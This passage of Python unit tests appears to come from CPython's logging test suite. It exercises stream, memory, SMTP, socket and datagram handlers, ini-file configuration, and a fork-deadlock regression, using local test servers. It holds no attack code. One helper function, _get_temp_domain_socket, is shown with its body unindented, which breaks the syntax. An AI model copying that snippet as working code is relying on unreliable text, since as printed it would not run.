        locks_held__ready_to_fork = threading.Event()
        fork_happened__release_locks_and_end_thread = threading.Event()

        def lock_holder_thread_fn():
            logging._acquireLock()
            try:
                refed_h.acquire()
                try:
                    # Tell the main thread to do the fork.
                    locks_held__ready_to_fork.set()

                    # If the deadlock bug exists, the fork will happen
                    # without dealing with the locks we hold, deadlocking
                    # the child.

                    # Wait for a successful fork or an unreasonable amount of
                    # time before releasing our locks. To avoid a timing based
                    # test we'd need communication from os.fork() as to when it
                    # has actually happened. Given this is a regression test
                    # for a fixed issue, potentially less reliably detecting
                    # regression via timing is acceptable for simplicity.
                    # The test will always take at least this long. :(
                    fork_happened__release_locks_and_end_thread.wait(0.5)
                finally:
                    refed_h.release()
            finally:
                logging._releaseLock()

        lock_holder_thread = threading.Thread(
            target=lock_holder_thread_fn,
            name='test_post_fork_child_no_deadlock lock holder')
        lock_holder_thread.start()

        locks_held__ready_to_fork.wait()
        pid = os.fork()
        if pid == 0:
            # Child process
            try:
                test_logger.info(r'Child process did not deadlock. \o/')
            finally:
                os._exit(0)
        else:
            # Parent process
            test_logger.info(r'Parent process returned from fork. \o/')
            fork_happened__release_locks_and_end_thread.set()
            lock_holder_thread.join()

            support.wait_process(pid, exitcode=0)
class BadStream(object):
    """File-like object whose write() always raises, used to exercise
    StreamHandler's error-handling path."""
    def write(self, data):
        # Simulate an unusable stream: every write attempt blows up.
        raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
    """StreamHandler subclass that records the record passed to
    handleError() instead of printing a traceback, so tests can
    assert on which record failed."""
    def handleError(self, record):
        # Capture the failing record for later inspection.
        self.error_record = record
class StreamWithIntName(object):
    """Stream stand-in whose ``name`` attribute is an int rather than a
    string, used to check that StreamHandler.__repr__ copes with it."""
    level = logging.NOTSET  # handler-like level attribute read by repr()
    name = 2  # deliberately an int, not a str
class StreamHandlerTest(BaseTest):
    """Tests for logging.StreamHandler behaviour."""

    def test_error_handling(self):
        # A custom handleError() implementation must receive the record
        # whose emission failed.
        handler = TestStreamHandler(BadStream())
        record = logging.makeLogRecord({})
        saved_raise = logging.raiseExceptions
        try:
            handler.handle(record)
            self.assertIs(handler.error_record, record)

            # The default handleError() prints the traceback to stderr...
            handler = logging.StreamHandler(BadStream())
            with support.captured_stderr() as stderr:
                handler.handle(record)
            self.assertIn('\nRuntimeError: deliberate mistake\n',
                          stderr.getvalue())

            # ...unless raiseExceptions is off, in which case the error
            # is swallowed silently.
            logging.raiseExceptions = False
            with support.captured_stderr() as stderr:
                handler.handle(record)
            self.assertEqual('', stderr.getvalue())
        finally:
            # Restore the module-global flag for other tests.
            logging.raiseExceptions = saved_raise

    def test_stream_setting(self):
        """
        Test setting the handler's stream
        """
        handler = logging.StreamHandler()
        new_stream = io.StringIO()
        previous = handler.setStream(new_stream)
        self.assertIs(previous, sys.stderr)
        current = handler.setStream(previous)
        self.assertIs(current, new_stream)
        # Setting the stream to its existing value is a no-op and
        # returns None.
        self.assertIsNone(handler.setStream(previous))

    def test_can_represent_stream_with_int_name(self):
        # repr() must not choke on a non-string stream name.
        handler = logging.StreamHandler(StreamWithIntName())
        self.assertEqual(repr(handler), '<StreamHandler 2 (NOTSET)>')
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
class TestSMTPServer(smtpd.SMTPServer):
    """
    This class implements a test SMTP server.

    :param addr: A (host, port) tuple which the server listens on.
                 You can specify a port value of zero: the server's
                 *port* attribute will hold the actual port number
                 used, which can be used in client connections.
    :param handler: A callable which will be called to process
                    incoming messages. The handler will be passed
                    the client address tuple, who the message is from,
                    a list of recipients and the message data.
    :param poll_interval: The interval, in seconds, used in the underlying
                          :func:`select` or :func:`poll` call by
                          :func:`asyncore.loop`.
    :param sockmap: A dictionary which will be used to hold
                    :class:`asyncore.dispatcher` instances used by
                    :func:`asyncore.loop`. This avoids changing the
                    :mod:`asyncore` module's global state.
    """

    def __init__(self, addr, handler, poll_interval, sockmap):
        smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
                                  decode_data=True)
        # The bind may have requested port 0; record the port actually
        # chosen so clients can connect to it.
        self.port = self.socket.getsockname()[1]
        self._handler = handler
        self._thread = None
        self._quit = False
        self.poll_interval = poll_interval

    def process_message(self, peer, mailfrom, rcpttos, data):
        """
        Delegates to the handler passed in to the server's constructor.

        Typically, this will be a test case method.
        :param peer: The client (host, port) tuple.
        :param mailfrom: The address of the sender.
        :param rcpttos: The addresses of the recipients.
        :param data: The message.
        """
        self._handler(peer, mailfrom, rcpttos, data)

    def start(self):
        """
        Start the server running on a separate daemon thread.
        """
        self._thread = t = threading.Thread(target=self.serve_forever,
                                            args=(self.poll_interval,))
        t.daemon = True
        t.start()

    def serve_forever(self, poll_interval):
        """
        Run the :mod:`asyncore` loop until normal termination
        conditions arise.
        :param poll_interval: The interval, in seconds, used in the underlying
                              :func:`select` or :func:`poll` call by
                              :func:`asyncore.loop`.
        """
        # count=1 makes each loop() call poll exactly once, so _quit is
        # re-checked at least every poll_interval seconds.
        while not self._quit:
            asyncore.loop(poll_interval, map=self._map, count=1)

    def stop(self):
        """
        Stop the thread by closing the server instance.
        Wait for the server thread to terminate.
        """
        self._quit = True
        threading_helper.join_thread(self._thread)
        self._thread = None
        self.close()
        # Close any remaining client dispatchers registered in our map.
        asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
    """
    Mixin that runs a server on a background daemon thread and lets it be
    shut down programmatically.

    Request handling is simplified: rather than deriving a suitable
    RequestHandler subclass, callers supply a callable which is invoked
    with each received request. The callable runs on the server thread,
    so requests are processed serially. While not quite web scale ;-),
    this should be fine for testing applications.

    :param handler: Callable invoked with a single argument - the request -
                    in order to process the request.
    :param poll_interval: The polling interval in seconds.
    """
    def __init__(self, handler, poll_interval):
        self._thread = None
        self.poll_interval = poll_interval
        self._handler = handler
        # Set by serve_forever() once the service loop is about to run.
        self.ready = threading.Event()

    def start(self):
        """Spawn a daemon thread running the server loop."""
        worker = threading.Thread(target=self.serve_forever,
                                  args=(self.poll_interval,))
        worker.daemon = True
        self._thread = worker
        worker.start()

    def serve_forever(self, poll_interval):
        """Signal readiness, then delegate to the real service loop."""
        self.ready.set()
        super(ControlMixin, self).serve_forever(poll_interval)

    def stop(self):
        """Ask the server thread to stop, and wait until it has."""
        self.shutdown()
        if self._thread is not None:
            threading_helper.join_thread(self._thread)
            self._thread = None
        self.server_close()
        self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
    """
    An HTTP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval in seconds.
    :param log: Pass ``True`` to enable log messages.
    :param sslctx: Optional ``ssl.SSLContext``; when given, accepted
                   sockets are wrapped server-side (HTTPS).
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 log=False, sslctx=None):
        class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
            def __getattr__(self, name):
                # __getattr__ is always invoked by the interpreter with
                # just the attribute name, so the previous unused
                # ``default=None`` parameter was dead and misleading.
                # Route every do_GET/do_POST/... lookup to the single
                # process_request() delegator.
                if name.startswith('do_'):
                    return self.process_request
                raise AttributeError(name)

            def process_request(self):
                # Forward the request object to the user-supplied handler.
                self.server._handler(self)

            def log_message(self, format, *args):
                # Silence per-request logging unless explicitly enabled.
                if log:
                    super(DelegatingHTTPRequestHandler,
                          self).log_message(format, *args)

        HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
        ControlMixin.__init__(self, handler, poll_interval)
        self.sslctx = sslctx

    def get_request(self):
        try:
            sock, addr = self.socket.accept()
            if self.sslctx:
                sock = self.sslctx.wrap_socket(sock, server_side=True)
        except OSError as e:
            # socket errors are silenced by the caller, print them here
            sys.stderr.write("Got an error:\n%s\n" % e)
            raise
        return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
    """
    A TCP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a single
                    parameter - the request - in order to process the request.
    :param poll_interval: The polling interval in seconds.
    :bind_and_activate: If True (the default), binds the server and starts it
                        listening. If False, you need to call
                        :meth:`server_bind` and :meth:`server_activate` at
                        some later time before calling :meth:`start`, so that
                        the server will set up the socket and listen on it.
    """

    # Allow rapid rebinding of the same address across test runs.
    allow_reuse_address = True

    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingTCPRequestHandler(StreamRequestHandler):

            def handle(self):
                # Forward the request object to the user-supplied handler.
                self.server._handler(self)

        ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)

    def server_bind(self):
        super(TestTCPServer, self).server_bind()
        # Record the actual port (useful when addr requested port 0).
        self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
    """
    A UDP server which is controllable using :class:`ControlMixin`.

    :param addr: A tuple with the IP address and port to listen on.
    :param handler: A handler callable which will be called with a
                    single parameter - the request - in order to
                    process the request.
    :param poll_interval: The polling interval for shutdown requests,
                          in seconds.
    :bind_and_activate: If True (the default), binds the server and
                        starts it listening. If False, you need to
                        call :meth:`server_bind` and
                        :meth:`server_activate` at some later time
                        before calling :meth:`start`, so that the server will
                        set up the socket and listen on it.
    """
    def __init__(self, addr, handler, poll_interval=0.5,
                 bind_and_activate=True):
        class DelegatingUDPRequestHandler(DatagramRequestHandler):

            def handle(self):
                # Forward the request object to the user-supplied handler.
                self.server._handler(self)

            def finish(self):
                data = self.wfile.getvalue()
                if data:
                    try:
                        super(DelegatingUDPRequestHandler, self).finish()
                    except OSError:
                        # Ignore send errors raised while the server is
                        # being shut down; re-raise otherwise.
                        if not self.server._closed:
                            raise

        ThreadingUDPServer.__init__(self, addr,
                                    DelegatingUDPRequestHandler,
                                    bind_and_activate)
        ControlMixin.__init__(self, handler, poll_interval)
        self._closed = False

    def server_bind(self):
        super(TestUDPServer, self).server_bind()
        # Record the actual port (useful when addr requested port 0).
        self.port = self.socket.getsockname()[1]

    def server_close(self):
        super(TestUDPServer, self).server_close()
        # Flag consulted by the request handler's finish() above.
        self._closed = True
if hasattr(socket, "AF_UNIX"):
    # Unix-domain variants of the stream/datagram test servers; only
    # defined on platforms that support AF_UNIX sockets.
    class TestUnixStreamServer(TestTCPServer):
        address_family = socket.AF_UNIX

    class TestUnixDatagramServer(TestUDPServer):
        address_family = socket.AF_UNIX
# - end of server_helper section
@support.requires_working_socket()
class SMTPHandlerTest(BaseTest):
    # bpo-14314, bpo-19665, bpo-34092: don't wait forever
    TIMEOUT = support.LONG_TIMEOUT

    def test_basic(self):
        # Send one record through an SMTPHandler to an in-process SMTP
        # server and verify envelope and payload arrive intact.
        sockmap = {}
        server = TestSMTPServer((socket_helper.HOST, 0), self.process_message, 0.001,
                                sockmap)
        server.start()
        addr = (socket_helper.HOST, server.port)
        h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
                                         timeout=self.TIMEOUT)
        self.assertEqual(h.toaddrs, ['you'])
        self.messages = []
        r = logging.makeLogRecord({'msg': 'Hello \u2713'})
        self.handled = threading.Event()
        h.handle(r)
        # process_message() sets the event on the server thread.
        self.handled.wait(self.TIMEOUT)
        server.stop()
        self.assertTrue(self.handled.is_set())
        self.assertEqual(len(self.messages), 1)
        peer, mailfrom, rcpttos, data = self.messages[0]
        self.assertEqual(mailfrom, 'me')
        self.assertEqual(rcpttos, ['you'])
        self.assertIn('\nSubject: Log\n', data)
        # The non-ASCII message body must survive the round trip.
        self.assertTrue(data.endswith('\n\nHello \u2713'))
        h.close()

    def process_message(self, *args):
        # Called by TestSMTPServer on its thread for each message.
        self.messages.append(args)
        self.handled.set()
class MemoryHandlerTest(BaseTest):

    """Tests for the MemoryHandler."""

    # Do not bother with a logger name group.
    expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"

    def setUp(self):
        BaseTest.setUp(self)
        # Buffer up to 10 records; flush early at WARNING or above.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr)
        self.mem_logger = logging.getLogger('mem')
        self.mem_logger.propagate = 0
        self.mem_logger.addHandler(self.mem_hdlr)

    def tearDown(self):
        self.mem_hdlr.close()
        BaseTest.tearDown(self)

    def test_flush(self):
        # The memory handler flushes to its target handler based on specific
        # criteria (message count and message level).
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        # This will flush because the level is >= logging.WARNING
        self.mem_logger.warning(self.next_message())
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
            ('WARNING', '3'),
        ]
        self.assert_log_lines(lines)
        for n in (4, 14):
            for i in range(9):
                self.mem_logger.debug(self.next_message())
            self.assert_log_lines(lines)
            # This will flush because it's the 10th message since the last
            # flush.
            self.mem_logger.debug(self.next_message())
            lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
            self.assert_log_lines(lines)

        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)

    def test_flush_on_close(self):
        """
        Test that the flush-on-close configuration works as expected.
        """
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.info(self.next_message())
        self.assert_log_lines([])
        self.mem_logger.removeHandler(self.mem_hdlr)
        # Default behaviour is to flush on close. Check that it happens.
        self.mem_hdlr.close()
        lines = [
            ('DEBUG', '1'),
            ('INFO', '2'),
        ]
        self.assert_log_lines(lines)
        # Now configure for flushing not to be done on close.
        self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
                                                       self.root_hdlr,
                                                       False)
        self.mem_logger.addHandler(self.mem_hdlr)
        self.mem_logger.debug(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.info(self.next_message())
        self.assert_log_lines(lines)  # no change
        self.mem_logger.removeHandler(self.mem_hdlr)
        self.mem_hdlr.close()
        # assert that no new lines have been added
        self.assert_log_lines(lines)  # no change

    def test_race_between_set_target_and_flush(self):
        # Regression test: setTarget(None) racing with flush() must not
        # crash even though flush may observe a vanishing target.
        class MockRaceConditionHandler:
            def __init__(self, mem_hdlr):
                self.mem_hdlr = mem_hdlr
                self.threads = []

            def removeTarget(self):
                self.mem_hdlr.setTarget(None)

            def handle(self, msg):
                # Drop the target from another thread while a flush is
                # in progress.
                thread = threading.Thread(target=self.removeTarget)
                self.threads.append(thread)
                thread.start()

        target = MockRaceConditionHandler(self.mem_hdlr)
        try:
            self.mem_hdlr.setTarget(target)

            for _ in range(10):
                time.sleep(0.005)
                self.mem_logger.info("not flushed")
                self.mem_logger.warning("flushed")
        finally:
            for thread in target.threads:
                threading_helper.join_thread(thread)
class ExceptionFormatter(logging.Formatter):
    """Formatter that renders an exception as just its class name."""
    def formatException(self, ei):
        # ei is the usual (type, value, traceback) triple; only the
        # exception type's name matters here.
        exc_type = ei[0]
        return "Got a [{}]".format(exc_type.__name__)
class ConfigFileTest(BaseTest):

    """Reading logging config from a .ini-style config file."""

    check_no_resource_warning = warnings_helper.check_no_resource_warning
    expected_log_pat = r"^(\w+) \+\+ (\w+)$"

    # config0 is a standard configuration.
    config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config1 adds a little to the standard configuration.
    config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config1a moves the handler to the root.
    config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config2 has a subtle configuration error that should be reported
    config2 = config1.replace("sys.stdout", "sys.stbout")

    # config3 has a less subtle configuration error
    config3 = config1.replace("formatter=form1", "formatter=misspelled_name")

    # config4 specifies a custom formatter class to be loaded
    config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""

    # config5 specifies a custom handler class to be loaded
    config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')

    # config6 uses ', ' delimiters in the handlers and formatters sections
    config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""

    # config7 adds a compiler logger, and uses kwargs instead of args.
    config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""

    # config 8, check for resource warning
    config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
kwargs={{"encoding": "utf-8"}}
"""

    disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""

    def apply_config(self, conf, **kwargs):
        # Feed the (dedented) config text to fileConfig via a file-like
        # object, so no temp file is needed for most tests.
        file = io.StringIO(textwrap.dedent(conf))
        logging.config.fileConfig(file, encoding="utf-8", **kwargs)

    def test_config0_ok(self):
        # A simple config file which overrides the default settings.
        with support.captured_stdout() as output:
            self.apply_config(self.config0)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config0_using_cp_ok(self):
        # A simple config file which overrides the default settings.
        with support.captured_stdout() as output:
            file = io.StringIO(textwrap.dedent(self.config0))
            cp = configparser.ConfigParser()
            cp.read_file(file)
            # fileConfig also accepts a pre-built ConfigParser instance.
            logging.config.fileConfig(cp)
            logger = logging.getLogger()
            # Won't output anything
            logger.info(self.next_message())
            # Outputs a message
            logger.error(self.next_message())
            self.assert_log_lines([
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config1_ok(self, config=config1):
        # A config file defining a sub-parser as well.
        with support.captured_stdout() as output:
            self.apply_config(config)
            logger = logging.getLogger("compiler.parser")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config2_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config2)

    def test_config3_failure(self):
        # A simple config file which overrides the default settings.
        self.assertRaises(Exception, self.apply_config, self.config3)

    def test_config4_ok(self):
        # A config file specifying a custom formatter class.
        with support.captured_stdout() as output:
            self.apply_config(self.config4)
            logger = logging.getLogger()
            try:
                raise RuntimeError()
            except RuntimeError:
                logging.exception("just testing")
            sys.stdout.seek(0)
            # ExceptionFormatter renders the traceback as 'Got a [...]'.
            self.assertEqual(output.getvalue(),
                "ERROR:root:just testing\nGot a [RuntimeError]\n")
            # Original logger output is empty
            self.assert_log_lines([])

    def test_config5_ok(self):
        self.test_config1_ok(config=self.config5)

    def test_config6_ok(self):
        self.test_config1_ok(config=self.config6)

    def test_config7_ok(self):
        with support.captured_stdout() as output:
            self.apply_config(self.config1a)
            logger = logging.getLogger("compiler.parser")
            # See issue #11424. compiler-hyphenated sorts
            # between compiler and compiler.xyz and this
            # was preventing compiler.xyz from being included
            # in the child loggers of compiler because of an
            # overzealous loop termination condition.
            hyphenated = logging.getLogger('compiler-hyphenated')
            # All will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '1'),
                ('ERROR', '2'),
                ('CRITICAL', '3'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])
        with support.captured_stdout() as output:
            self.apply_config(self.config7)
            logger = logging.getLogger("compiler.parser")
            self.assertFalse(logger.disabled)
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            logger = logging.getLogger("compiler.lexer")
            # Both will output a message
            logger.info(self.next_message())
            logger.error(self.next_message())
            # Will not appear
            hyphenated.critical(self.next_message())
            self.assert_log_lines([
                ('INFO', '4'),
                ('ERROR', '5'),
                ('INFO', '6'),
                ('ERROR', '7'),
            ], stream=output)
            # Original logger output is empty.
            self.assert_log_lines([])

    def test_config8_ok(self):

        def cleanup(h1, fn):
            h1.close()
            os.remove(fn)

        with self.check_no_resource_warning():
            fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
            os.close(fd)

            # Replace single backslash with double backslash in windows
            # to avoid unicode error during string formatting
            if os.name == "nt":
                fn = fn.replace("\\", "\\\\")

            config8 = self.config8.format(tempfile=fn)

            # Applying the config twice must not leak the first
            # FileHandler's stream (this is what the resource-warning
            # check guards against).
            self.apply_config(config8)
            self.apply_config(config8)

        handler = logging.root.handlers[0]
        self.addCleanup(cleanup, handler, fn)

    def test_logger_disabling(self):
        self.apply_config(self.disable_test)
        logger = logging.getLogger('some_pristine_logger')
        self.assertFalse(logger.disabled)
        # Re-applying with default disable_existing_loggers=True disables
        # loggers created since the previous call.
        self.apply_config(self.disable_test)
        self.assertTrue(logger.disabled)
        self.apply_config(self.disable_test, disable_existing_loggers=False)
        self.assertFalse(logger.disabled)

    def test_config_set_handler_names(self):
        test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
        self.apply_config(test_config)
        # The handler's .name should be taken from its config section.
        self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')

    def test_defaults_do_no_interpolation(self):
        """bpo-33802 defaults should not get interpolated"""
        ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
        fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
        try:
            os.write(fd, ini.encode('ascii'))
            os.close(fd)
            # The dict-valued defaults must be passed through untouched,
            # not subjected to %-interpolation by configparser.
            logging.config.fileConfig(
                fn,
                encoding="utf-8",
                defaults=dict(
                    version=1,
                    disable_existing_loggers=False,
                    formatters={
                        "generic": {
                            "format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
                            "datefmt": "[%Y-%m-%d %H:%M:%S %z]",
                            "class": "logging.Formatter"
                        },
                    },
                )
            )
        finally:
            os.unlink(fn)
@support.requires_working_socket()
class SocketHandlerTest(BaseTest):

    """Test for SocketHandler objects."""

    server_class = TestTCPServer
    address = ('localhost', 0)

    def setUp(self):
        """Set up a TCP server to receive log messages, and a SocketHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_socket, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.SocketHandler
        if isinstance(server.server_address, tuple):
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            # AF_UNIX: server_address is a filesystem path; no port.
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        # Released once per record fully received by handle_socket().
        self.handled = threading.Semaphore(0)

    def tearDown(self):
        """Shutdown the TCP server."""
        try:
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
            if self.server:
                self.server.stop()
        finally:
            BaseTest.tearDown(self)

    def handle_socket(self, request):
        # Runs on the server thread: parse the length-prefixed pickle
        # stream that SocketHandler produces.
        conn = request.connection
        while True:
            chunk = conn.recv(4)
            if len(chunk) < 4:
                break
            slen = struct.unpack(">L", chunk)[0]
            chunk = conn.recv(slen)
            while len(chunk) < slen:
                chunk = chunk + conn.recv(slen - len(chunk))
            obj = pickle.loads(chunk)
            record = logging.makeLogRecord(obj)
            self.log_output += record.msg + '\n'
            self.handled.release()

    def test_output(self):
        # The log message sent to the SocketHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("tcp")
        logger.error("spam")
        self.handled.acquire()
        logger.debug("eggs")
        self.handled.acquire()
        self.assertEqual(self.log_output, "spam\neggs\n")

    def test_noserver(self):
        if self.server_exception:
            self.skipTest(self.server_exception)
        # Avoid timing-related failures due to SocketHandler's own hard-wired
        # one-second timeout on socket.create_connection() (issue #16264).
        self.sock_hdlr.retryStart = 2.5
        # Kill the server
        self.server.stop()
        # The logging call should try to connect, which should fail
        try:
            raise RuntimeError('Deliberate mistake')
        except RuntimeError:
            self.root_logger.exception('Never sent')
        self.root_logger.error('Never sent, either')
        now = time.time()
        self.assertGreater(self.sock_hdlr.retryTime, now)
        time.sleep(self.sock_hdlr.retryTime - now + 0.001)
        self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):

    """Test for SocketHandler with unix sockets."""

    if hasattr(socket, "AF_UNIX"):
        # Only resolvable on platforms that provide AF_UNIX.
        server_class = TestUnixStreamServer

    def setUp(self):
        # override the definition in the base class
        self.address = _get_temp_domain_socket()
        SocketHandlerTest.setUp(self)

    def tearDown(self):
        SocketHandlerTest.tearDown(self)
        # Remove the socket file created for this test.
        os_helper.unlink(self.address)
@support.requires_working_socket()
class DatagramHandlerTest(BaseTest):

    """Test for DatagramHandler."""

    server_class = TestUDPServer
    address = ('localhost', 0)

    def setUp(self):
        """Set up a UDP server to receive log messages, and a DatagramHandler
        pointing to that server's address and port."""
        BaseTest.setUp(self)
        # Issue #29177: deal with errors that happen during setup
        self.server = self.sock_hdlr = self.server_exception = None
        try:
            self.server = server = self.server_class(self.address,
                                                     self.handle_datagram, 0.01)
            server.start()
            # Uncomment next line to test error recovery in setUp()
            # raise OSError('dummy error raised')
        except OSError as e:
            self.server_exception = e
            return
        server.ready.wait()
        hcls = logging.handlers.DatagramHandler
        if isinstance(server.server_address, tuple):
            self.sock_hdlr = hcls('localhost', server.port)
        else:
            # AF_UNIX: server_address is a filesystem path; no port.
            self.sock_hdlr = hcls(server.server_address, None)
        self.log_output = ''
        self.root_logger.removeHandler(self.root_logger.handlers[0])
        self.root_logger.addHandler(self.sock_hdlr)
        # Set once per datagram fully handled by handle_datagram().
        self.handled = threading.Event()

    def tearDown(self):
        """Shutdown the UDP server."""
        try:
            if self.server:
                self.server.stop()
            if self.sock_hdlr:
                self.root_logger.removeHandler(self.sock_hdlr)
                self.sock_hdlr.close()
        finally:
            BaseTest.tearDown(self)

    def handle_datagram(self, request):
        # Datagrams carry a 4-byte length prefix followed by a pickled
        # dict; strip the prefix and rebuild the LogRecord.
        slen = struct.pack('>L', 0)  # length of prefix
        packet = request.packet[len(slen):]
        obj = pickle.loads(packet)
        record = logging.makeLogRecord(obj)
        self.log_output += record.msg + '\n'
        self.handled.set()

    def test_output(self):
        # The log message sent to the DatagramHandler is properly received.
        if self.server_exception:
            self.skipTest(self.server_exception)
        logger = logging.getLogger("udp")
        logger.error("spam")
        self.handled.wait()
        self.handled.clear()
        logger.error("eggs")
        self.handled.wait()
        self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):

    """Test for DatagramHandler using Unix sockets."""

    if hasattr(socket, "AF_UNIX"):
        # Only resolvable on platforms that provide AF_UNIX.
        server_class = TestUnixDatagramServer

    def setUp(self):
